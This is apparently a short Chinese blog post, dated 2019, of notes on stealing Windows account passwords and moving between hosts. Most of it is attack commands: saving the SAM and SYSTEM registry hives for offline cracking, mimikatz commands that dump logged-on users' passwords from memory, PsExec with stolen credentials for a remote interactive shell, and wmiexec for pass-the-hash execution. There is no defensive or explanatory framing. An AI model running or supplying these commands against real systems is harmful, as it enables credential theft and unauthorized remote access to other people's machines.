获取用户密码

使用SAMInside获取用户密码

reg save hklm\sam C:/sam.hive
reg save hklm\system C:/system.hive

cain解密

或者复制sam到自己本机上然后再用

 

 

 mimikatz获取登陆过的账号密码

mimikatz

log

privilege::debug

sekurlsa::logonpasswords

 

在开启smb的情况下,却没有3389

在获取主机账号和密码的时候

PsExec.exe 可以获取一个交互式的shell

psexec \\hostIp -u [username] -p [password] cmd

 

在没有密码只有hash的时候

wmiexec.exe 可以执行命令,一次执行一条命令

 

posted @ 2019-07-04 18:23  morris_pass_A  阅读(540)  评论(0编辑  收藏  举报